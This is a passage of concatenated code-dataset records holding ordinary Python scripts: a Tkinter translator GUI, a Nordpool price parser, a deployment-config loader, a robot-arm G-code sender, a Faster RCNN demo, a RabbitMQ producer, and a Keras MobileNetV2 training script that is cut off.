command=partial(display_English, 'medium'))\n buttoncenter.grid(column=1, row=1, padx=10, pady=10)\n buttonright = tk.Button(text='dexter', command=partial(display_English, 'dexter'))\n buttonright.grid(column=2, row=1, padx=10, pady=10)\n\n\n # call the window mainloop function\n window.mainloop()\n\n# Call the main function\nmain()","sub_path":"studentCode/GUI/gui_latin_translator.py","file_name":"gui_latin_translator.py","file_ext":"py","file_size_in_byte":2321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"646101869","text":"# Tulkintaohjelma Nordpoolin day ahead -hintatietojen lukemiseen\n# txt-tiedostosta ja niiden tulkintaan aikatauluttaja-ohjelmaa varten\n\n######### DATAN TUOTTO #########\n\njarj=[] #Alustetaan hintajärjestyksen muuttuja\nminim=0 #Alustetaan minimiarvon muuttuja\n\ndef jarjestys(tiedot): # Funktio luo listan tunneista, joka on järjestetty halvimmasta kalleimpaan.\n\ti=0\n\tkeys=tiedot.keys()\n\t\n\tlista=sorted(keys, key=tiedot.__getitem__)\n\treturn lista\n\ndef minimi(tiedot):\n\tminim = min(tiedot, key=tiedot.get)\n\tprint(minim)\n\treturn minim\n\ndef delta(tiedot, min): # Funktio laskee tuntien välisen hintaeron. Päivän ensimmäinen tunti näytetään nollana.\n\tlista=[]\n\tfor rivi in tiedot:\n\t\tif rivi > 0:\n\t\t\tarvo=float(((tiedot[rivi]-tiedot[min])/tiedot[min]))\n\t\t\tlista.append(arvo)\n\t\telse:\n\t\t\tarvo = 0\n\t\t\tlista.append(arvo)\n\t\tprint(\"{:.2f}\".format(arvo))\n\treturn lista\n\t\t\ndef xmlparsinta(tiedot): # Funktio hakee parsinta.py -moduulin, joka lukee hintatiedot xml-tiedostosta python-sanakirjaksi muuttujaan tiedot\n\timport parsinta\n\ttiedot = parsinta.luetiedot(tiedot)\n\treturn tiedot\n\n######### DATAN KÄSITTELY #########\n\t\n######### MAIN #########\ndef main():\n\ttiedot={}\n\ttry:\n\t\ttiedot=xmlparsinta(tiedot)\n\t\tfor rivi in tiedot:\n\t\t\tprint(rivi, tiedot[rivi])\n\n\t\tjarj=jarjestys(tiedot)\n\t\tminim=minimi(tiedot)\n\t\tmuutos=delta(tiedot, minim)\n\t\tprint(muutos)\n\texcept OSError:\n\t\tprint(\"Virhe tiedoston lukemisessa.\")\n\t\nmain()","sub_path":"tulkinta.py","file_name":"tulkinta.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"627429131","text":"from heft.algs.ga.GAImplementation.GAImpl import GAFactory\nfrom heft.core.CommonComponents.ExperimentalManagers import ExperimentResourceManager, ExperimentEstimator\nfrom heft.core.environment import ResourceGenerator\nfrom heft.core.environment.ResourceManager import Schedule\nfrom heft.core.environment.Utility import profile_decorator, wf\n\n\n_wf = wf(\"Montage_100\")\nresources = ResourceGenerator.r([10, 15, 25, 30])\nresource_manager = ExperimentResourceManager(resources)\nestimator = ExperimentEstimator(None, ideal_flops=20, reliability=1.0, transfer_time=100)\n\nga = GAFactory.default().create_ga(silent=True,\n wf=_wf,\n resource_manager=resource_manager,\n estimator=estimator,\n ga_params={\n \"population\": 10,\n \"crossover_probability\": 0.8,\n \"replacing_mutation_probability\": 0.5,\n \"sweep_mutation_probability\": 0.4,\n \"generations\": 20\n })\n\n@profile_decorator\ndef fnc():\n empty_schedule = Schedule({node: [] for node in resource_manager.get_nodes()})\n res = ga(empty_schedule, None)\n print(res)\n pass\n\nif __name__ == \"__main__\":\n fnc()\n\n\n","sub_path":"heft/algs/ga/utilities/Profiling.py","file_name":"Profiling.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"501385095","text":"# -*- coding: utf-8 -*-\n# 需要安装protobuf\nimport gen_py_from_pb\nimport sys\nimport os\ngen_py_from_pb.gen_py_from_pb('./deploy/proto/')\nsys.path.append(os.path.join(os.path.dirname(os.path.dirname(__file__)), \"./proto/\"))\nfrom google.protobuf import text_format\nfrom gcm_pb2 import *\nfrom loghelper import LogError\n\n\nclass ArtifactInstance:\n def __init__(self):\n self.instance_id = None # instance的地址。比如:5.1.7.2\n self.instance_name = None # instance的名称地址。比如:test.zone_1.logic_svr.2\n self.artifact_name = None # instance对应的artifact名称。比如:logic_svr\n self.host_name = None # instance将被部署的目标服务器名。比如:server1\n self.inner_ip = None # instance将被部署的目标服务器的内网IP。比如:192.168.1.100\n self.outer_ip = None # instance将被部署的目标服务器的外网IP。比如:100.233.66.39\n self.deploy_ip = None # instance将被部署的目标服务器的部署IP。比如:192.168.1.100\n self.start_priority = 0 # instance的启动优先级,默认为0。值越大,越先启动。\n # self.__emergence_order = None # instance在deploy.conf中出现的顺序。(用于确定启动顺序)\n self.artifact = None\n self.index = 0\n\n def __str__(self):\n return self.instance_id + \" \" + self.instance_name\n\n\nclass GcmData:\n def __init__(self):\n self.host_map = {}\n self.agent_artifact = None\n self.template_artifact_map = {}\n self.artifact_map = {}\n self.artifact_group_map = {}\n self.deploy_info = DeployInfo()\n self.variable_map = {}\n self.world_map = {}\n self.artifact_instances = []\n\n def init(self, conf_paths):\n for path in conf_paths:\n self._load_conf(path)\n # check syntax\n self._check_syntax()\n self._convert_template_artifacts()\n self._gen_instance()\n\n def _load_conf(self, conf_path):\n # parse hosts.conf\n host_cfg = HostCfg()\n host_path = os.path.join(conf_path, 'hosts.conf')\n self._load_proto(host_path, host_cfg)\n for host in host_cfg.hosts:\n self.host_map[host.name] = host\n\n # parse agent_artifacts.conf\n agent_artifact = AgentArtifact()\n agent_artifact_path = os.path.join(conf_path, 'agent_artifacts.conf')\n self._load_proto(agent_artifact_path, agent_artifact)\n self.agent_artifact = agent_artifact\n\n # parse artifact_templates.conf\n template_artifact = TemplateArtifact()\n artifact_templates_path = os.path.join(conf_path, 'artifact_templates.conf')\n self._load_proto(artifact_templates_path, template_artifact)\n for item in template_artifact.template_artifacts:\n self.template_artifact_map[item.template_name] = item\n\n # parse artifacts.conf\n normal_artifact = NormalArtifact()\n artifact_path = os.path.join(conf_path, 'artifacts.conf')\n self._load_proto(artifact_path, normal_artifact)\n for item in normal_artifact.artifacts:\n self.artifact_map[item.name] = item\n\n # parse artifact_groups.conf\n artifact_group = ArtifactGroup()\n artifact_groups_path = os.path.join(conf_path, 'artifact_groups.conf')\n self._load_proto(artifact_groups_path, artifact_group)\n for item in artifact_group.artifact_groups:\n self.artifact_group_map[item.name] = item\n\n # parse deploy.conf\n deploy_path = os.path.join(conf_path, 'deploy.conf')\n deploy = Deploy()\n self._load_proto(deploy_path, deploy)\n for var in deploy.variables:\n self.variable_map[var.key] = var.value\n\n # parse global const variable\n self.deploy_info.tmp_root_path = deploy.tmp_root_path\n self.deploy_info.dst_root_path = deploy.dst_root_path\n self.deploy_info.listen_port = deploy.listen_port\n\n for word in deploy.worlds:\n if word.name in self.world_map:\n LogError('world name: %s is duplicated' % word.name)\n raise BaseException()\n else:\n self.world_map[word.name] = word\n\n @staticmethod\n def _load_proto(file_path, proto):\n if not os.path.exists(file_path):\n return\n with open(file_path) as f:\n text_format.Parse(f.read(), proto)\n\n def _check_syntax(self):\n function_id_set = set()\n for name, artifact in self.artifact_map.items():\n if artifact.function_id in function_id_set:\n LogError('function_id: %d is duplicated in artifacts.conf' % artifact.function_id)\n raise BaseException()\n function_id_set.add(artifact.function_id)\n\n world_id_set = set()\n for world_name in self.world_map:\n world = self.world_map[world_name]\n if not world.name:\n LogError('world name is empty in world_id:%d' % world.id)\n raise BaseException()\n if not world.id:\n LogError('world id is empty in world_name:%s' % world.name)\n raise BaseException()\n if not world.user:\n LogError('user is empty in world_name:%s' % world.name)\n raise BaseException()\n if not world.passwd:\n LogError('passwd is empty in world_name:%s' % world.name)\n raise BaseException()\n if world.id in world_id_set:\n LogError('world id: %d is duplicated' % world.id)\n raise BaseException()\n\n world_id_set.add(world.id)\n zone_name_set = set()\n zone_id_set = set()\n\n for zone in world.zones:\n if not zone.name:\n LogError('zone name: is empty in world name: %s' % world.name)\n raise BaseException()\n if not zone.id:\n LogError('zone id: is empty in world name: %s' % world.name)\n raise BaseException()\n if zone.name in zone_name_set:\n LogError('zone name: %s is duplicated in world name: %s' % (zone.name, world.name))\n raise BaseException()\n if zone.id in zone_id_set:\n LogError('zone id: %d is duplicated in world name: %s' % (zone.id, world.name))\n raise BaseException()\n\n zone_name_set.add(zone.name)\n zone_id_set.add(zone.id)\n groups_set = []\n\n for groups in zone.instance_groups:\n if not groups.artifact_group_name:\n LogError('artifact_group_name is empty in zone:%s in world:%s' % (zone.name, world_name))\n raise BaseException()\n if not groups.host_name:\n LogError('host_name is empty in zone:%s in world:%s' % (zone.name, world_name))\n raise BaseException()\n if not groups.instance_id:\n LogError('instance_id is empty in zone:%s in world:%s' % (zone.name, world_name))\n raise BaseException()\n if [groups.artifact_group_name, groups.instance_id] in groups_set:\n LogError('group_name: %s, instance_id: %d is duplicated in zone name: %s in world name: %s'\n % (groups.artifact_group_name, groups.instance_id, zone.name, world.name))\n raise BaseException()\n groups_set.append([groups.artifact_group_name, groups.instance_id])\n\n def _convert_template_artifacts(self):\n for name, artifact in self.artifact_map.items():\n if not artifact.template_name:\n continue\n if artifact.template_name not in self.template_artifact_map:\n LogError(\"can't find template artifacts name: %s in artifacts name: %s\"\n % (artifact.template_name, name))\n raise BaseException()\n template_artifact = self.template_artifact_map[artifact.template_name]\n artifact.files.MergeFrom(template_artifact.files)\n\n def _gen_instance(self):\n for world_name, world in self.world_map.items():\n for zone in world.zones:\n zone_name = zone.name\n for inst_groups in zone.instance_groups:\n group_name = inst_groups.artifact_group_name\n if group_name not in self.artifact_group_map:\n pformat = \"can't find artifact_group_name: %s in zone_name:%s in world_name:%s in artifact_groups.conf\"\n LogError(pformat % (group_name, zone_name, world_name))\n raise BaseException()\n if inst_groups.host_name not in self.host_map:\n pformat = \"can't find host_name: %s in zone_name:%s in world_name:%s in hosts.conf\"\n LogError(pformat % (inst_groups.host_name, zone_name, world_name))\n raise BaseException()\n group = self.artifact_group_map[group_name]\n for artifact_name in group.artifact_names:\n if artifact_name not in self.artifact_map:\n LogError(\"can't find artifact_group:%s's artifact_name:%s in artifacts.conf\"\n % (group_name, artifact_name))\n raise BaseException()\n artifact = self.artifact_map[artifact_name]\n host = self.host_map[inst_groups.host_name]\n instance = ArtifactInstance()\n instance.instance_id = '%d.%d.%d.%d' % (world.id, zone.id, artifact.function_id, inst_groups.instance_id)\n instance.instance_name = '%s.%s.%s.%s' % (world_name, zone_name, artifact.name, inst_groups.instance_id)\n instance.artifact_name = artifact_name\n instance.host_name = inst_groups.host_name\n instance.inner_ip = host.inner_ip\n instance.outer_ip = host.outer_ip\n instance.deploy_ip = host.deploy_ip\n instance.start_priority = artifact.start_priority\n self.artifact_instances.append(instance)\n\n\n\n","sub_path":"fk/deploy/src/gcm_data.py","file_name":"gcm_data.py","file_ext":"py","file_size_in_byte":10624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"438750685","text":"# -*- coding: utf-8 -*-\n# @Time : 2017/12/21 23:21\n# @Author : play4fun\n# @File : gcode_write_dragon.py\n# @Software: PyCharm\n\n\"\"\"\ngcode_write_dragon.py:\n毛笔字:龙\n\"\"\"\n\nimport sys, os\nfrom time import sleep\n\nsys.path.append(os.path.join(os.path.dirname(__file__), '..'))\n\nfrom uf.ufc import ufc_init\nfrom uf.comm.serial_ascii import SerialAscii\nfrom uf.utils.log import *\n\nlogger_init(logging.VERBOSE)\n\nprint('setup ser_ascii ...')\n\nser_iomap = {\n 'out': 'ser_out',\n 'in': 'ser_in',\n 'service': 'ser_service'\n}\n\nufc = ufc_init()\nser_ascii = SerialAscii(ufc, 'ser_ascii', ser_iomap, filters={'hwid': 'USB VID:PID=2341:0042'})\n\nprint('setup test ...')\nlogger = logging.getLogger('test')\n\n\ndef ser_out_cb(msg):\n logger.debug('callback: ' + msg)\n\n\ntest_ports = {\n 'ser_out': {'dir': 'in', 'type': 'topic', 'callback': ser_out_cb},\n 'ser_in': {'dir': 'out', 'type': 'topic'},\n 'ser_service': {'dir': 'out', 'type': 'service'}\n}\n\ntest_iomap = {\n 'ser_out': 'ser_out',\n 'ser_in': 'ser_in',\n 'ser_service': 'ser_service'\n}\n\nufc.node_init('test', test_ports, test_iomap)\n\nprint('\\nsleep 2 sec ...\\n')\nsleep(2)\n\n# print('\\nset X330 ...')\n# test_ports['ser_in']['handle'].publish('G0 X300 Y0 Z50')\n\n\n\nwith open('long_0001.GCODE') as f:\n gcodes = f.readlines()\n\n# print(gcodes)\n\nfor line in gcodes:#[:40]:\n if line.strip() == '':\n continue\n print(line)\n test_ports['ser_in']['handle'].publish(line)\n sleep(0.1)\n\nwhile True:\n sleep(1)","sub_path":"test2/gcode_write_dragon.py","file_name":"gcode_write_dragon.py","file_ext":"py","file_size_in_byte":1488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"34660390","text":"import pandas as pd\nimport numpy as np\nprevalence = pd.read_feather('tables/genes.1m.unique.prevalence.feather')\nprevalence.set_index('index', inplace=True)\n\n\nhists = {}\nfor c in prevalence.columns:\n if c in ['amplicon', 'isolate']:\n continue\n hists[c] = np.bincount(prevalence[c])\n\nsize = max(len(v) for v in hists.values())\nnhists = {}\nfor k,v in hists.items():\n c = np.zeros(size, dtype=int)\n c[:len(v)] = v\n nhists[k] = c\n\nnhists = pd.DataFrame(nhists)\nnhists.to_csv('tables/genes.prevalence.1m.hists.txt', sep='\\t')\n","sub_path":"profiles-all/gene.profiles/create-prevalence-histograms.1m.py","file_name":"create-prevalence-histograms.1m.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"383537414","text":"\"\"\"Faster RCNN Demo script.\"\"\"\nimport os\nimport argparse\nimport mxnet as mx\nimport gluoncv as gcv\nfrom gluoncv.data.transforms import presets\nfrom matplotlib import pyplot as plt\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='Test with Faster RCNN networks.')\n parser.add_argument('--network', type=str, default='faster_rcnn_resnet50_v2a_voc',\n help=\"Faster RCNN full network name\")\n parser.add_argument('--short', type=str, default='',\n help='Resize image to the given short side side, default to 600 for voc.')\n parser.add_argument('--max-size', type=str, default='',\n help='Max size of either side of image, default to 1000 for voc.')\n parser.add_argument('--images', type=str, default='',\n help='Test images, use comma to split multiple.')\n parser.add_argument('--gpus', type=str, default='0',\n help='Training with GPUs, you can specify 1,3 for example.')\n parser.add_argument('--pretrained', type=str, default='True',\n help='Load weights from previously saved parameters. You can specify parameter file name.')\n args = parser.parse_args()\n dataset = args.network.split('_')[-1]\n if dataset == 'voc':\n args.short = int(args.short) if args.short else 600\n args.max_size = int(args.max_size) if args.max_size else 1000\n elif dataset == 'coco':\n args.short = int(args.short) if args.short else 800\n args.max_size = int(args.max_size) if args.max_size else 1333\n return args\n\nif __name__ == '__main__':\n args = parse_args()\n # context list\n ctx = [mx.gpu(int(i)) for i in args.gpus.split(',') if i.strip()]\n ctx = [mx.cpu()] if not ctx else ctx\n\n # grab some image if not specified\n if not args.images.strip():\n gcv.utils.download(\"https://cloud.githubusercontent.com/assets/3307514/\" +\n \"20012568/cbc2d6f6-a27d-11e6-94c3-d35a9cb47609.jpg\", 'street.jpg')\n image_list = ['street.jpg']\n else:\n image_list = [x.strip() for x in args.images.split(',') if x.strip()]\n\n if args.pretrained.lower() in ['true', '1', 'yes', 't']:\n net = gcv.model_zoo.get_model(args.network, pretrained=True)\n else:\n net = gcv.model_zoo.get_model(args.network, pretrained=False)\n net.load_parameters(args.pretrained)\n net.set_nms(0.3, 200)\n\n ax = None\n for image in image_list:\n x, img = presets.rcnn.load_test(image, short=args.short, max_size=args.max_size)\n ids, scores, bboxes = [xx.asnumpy() for xx in net(x)]\n ax = gcv.utils.viz.plot_bbox(img, bboxes, scores, ids,\n class_names=net.classes, ax=ax)\n plt.show()\n","sub_path":"scripts/detection/faster_rcnn/demo_faster_rcnn.py","file_name":"demo_faster_rcnn.py","file_ext":"py","file_size_in_byte":2764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"325635432","text":"# Author: Real \n# CreateTime 2018/9/6-20:08 \n# IDE: PyCharm\n\nimport pika\n\nconnection = pika.BlockingConnection(\n pika.ConnectionParameters('localhost') #相当于创建一个Socket\n\n)\n# 一个很好的比喻就是 channel是消息传递的线路,好像一条高速公路,一条公路上可以跑很多汽车,这些汽车就是queue队列,汽车里的\n# 乘客就是我们要发送的数据本身,所以channel是路线,queue是载体.\n\nchannel = connection.channel() #声明一个管道(路线或者线路),消息通过管道发送\n\nchannel.queue_declare(queue='hello') #声明消息载体---queue的名字\n\n# 创建发送实例\nchannel.basic_publish(\n exchange='', #exchange 是消息转送节点\n routing_key='hello', #routing key 在channel(管道)中定义的queue,也就是消息的载体\n body='hello world!' #body 是消息内容\n)\n\nconnection.close()","sub_path":"进阶/消息队列/RabbitMQ简单实现/0.RabbitMQ_Producer.py","file_name":"0.RabbitMQ_Producer.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"363308510","text":"from util.data_container import StructTestContainer\nfrom util.data_interface import JsonDAO\nfrom util.plot import Plotter\nimport numpy as np\nfrom matplotlib.pyplot import subplot\n\nlayers_to_test = (2, 4, 5, 8, 10)\nneurons_per_layer_to_test = (3, 5, 10, 15, 20)\n\npaths = ['results/van_der_pol/2020-10-23-07-07-43-nn-structural-test/data.json',\n 'results/van_der_pol/2020-10-23-07-48-25-nn-structural-test/data.json',\n 'results/van_der_pol/2020-10-23-07-58-41-nn-structural-test/data.json',\n 'results/van_der_pol/2020-10-23-08-50-27-nn-structural-test/data.json',\n 'results/van_der_pol/2020-10-23-08-56-52-nn-structural-test/data.json']\n\nfinal_val_losses_matrixes = list()\nval_losses_20 = {4: list(), 5: list(), 8: list(), 10: list()}\nval_losses_10 = {4: list(), 5: list(), 8: list(), 10: list()}\nval_losses_len = 6329 #6360\n\ndao = JsonDAO()\n\nfor path in paths:\n dictionary = dao.load(path)\n data_container = StructTestContainer()\n data_container.results = dictionary\n final_losses = data_container.get_final_val_losses(layers_to_test, neurons_per_layer_to_test)\n final_val_losses_matrixes.append(final_losses)\n \n for layers in val_losses_10.keys():\n val_losses_10[layers].append(np.array(data_container.get_val_loss(layers, neurons=10)[:val_losses_len]))\n\n for layers in val_losses_20.keys():\n val_losses_20[layers].append(np.array(data_container.get_val_loss(layers, neurons=20)[:val_losses_len]))\n\nfor layers in val_losses_10.keys():\n val_losses_10[layers] = sum(val_losses_10[layers])/len(val_losses_10[layers])\n val_losses_20[layers] = sum(val_losses_20[layers])/len(val_losses_20[layers])\n\nplot_matrix = sum(final_val_losses_matrixes)/len(final_val_losses_matrixes)\n\nplotter = Plotter(fontsize=11)\nfigsize=(4.5, 4)\n\nplotter.plot_heatmap(data=np.log10(plot_matrix),\n title='$\\log$(MSE)', # validation\n x_label='Neurons per Layer',\n y_label='Number of Layers',\n row_labels=layers_to_test,\n col_labels=neurons_per_layer_to_test,\n figsize=figsize)\nloss_len = len(val_losses_10[4])\n\n## -\n\nplotter.plot(x_axis=np.linspace(1, loss_len, loss_len),\n y_axis_list=list(val_losses_10.values()),\n labels=[str(layers) + 'L of 10N' for layers in val_losses_10.keys()],\n title='MSE',\n x_label='Epoch',\n y_label=None,\n y_scale='log',\n line_styles=['-', '--', '-', '--'])\n\nplotter.plot(x_axis=np.linspace(1, loss_len, loss_len),\n y_axis_list=list(val_losses_20.values()),\n labels=[str(layers) + 'L of 20N' for layers in val_losses_20.keys()],\n title='MSE',\n x_label='Epoch',\n y_label=None,\n y_scale='log',\n line_styles=['-', '--', '-', '--'])\nplotter.show()\n","sub_path":"structural_test_avg_plot.py","file_name":"structural_test_avg_plot.py","file_ext":"py","file_size_in_byte":2909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"559763417","text":"from keras.applications.mobilenetv2 import MobileNetV2\nfrom keras import models, layers, optimizers\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom datetime import datetime\nimport time\nimport os\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom google.cloud import storage\nimport trainers\nfrom trainers.common import TimeHistory\n\nDATA_PATH = os.path.dirname(os.path.realpath(__file__)) + \"/data/\"\nBATCH_SIZE = 20\n\n\nif __name__ == \"__main__\":\n\n # initialize convolutional base\n conv_base = MobileNetV2(\n weights=\"imagenet\",\n input_shape=(224, 224, 3),\n include_top=False, # exclude the densely connected classifer, which sits on top of hte convolutional network\n )\n conv_base.trainable = False\n\n # initialize Sequential model and Dense players\n model = models.Sequential()\n model.add(conv_base)\n model.add(layers.Flatten())\n model.add(layers.Dense(640, activation=\"relu\", input_dim=(7 * 7 * 1280)))\n model.add(layers.Dense(1, activation=\"sigmoid\"))\n\n # initialize image data generators\n\n # augment training data to produce a model capable of handling data variations\n train_datagen = ImageDataGenerator(\n rescale=1.0\n / 255, # rescale to target values between 0 and 255 (default between 0 and 1)\n rotation_range=40, # train on variations rotated up to 40 degrees\n width_shift_range=0.2, # train using variations off-center on x-axis by factor of 0.2\n height_shift_range=0.2, # train using variations off-center on y-axis by a factor of 0.2\n shear_range=0.2, # train using variations sheared/warped by a factor of 0.2\n zoom_range=0.2, # train using variations zoomed by a factor of 0.2\n horizontal_flip=True, # x-axis flip\n vertical_flip=True, # y-axis flip\n )\n\n test_datagen = ImageDataGenerator(\n rescale=1.0\n / 255 # rescale to target values between 0 and 255 (default between 0 and 1)\n )\n\n # walk through './data/shapes' and load filenames into a dataframe with labels\n # read from fs\n root, dirs, files = next(os.walk(DATA_PATH))\n\n samples_df = pd.DataFrame(\n [\n {\n \"label\": file.split(\"_\")[0], # filename format '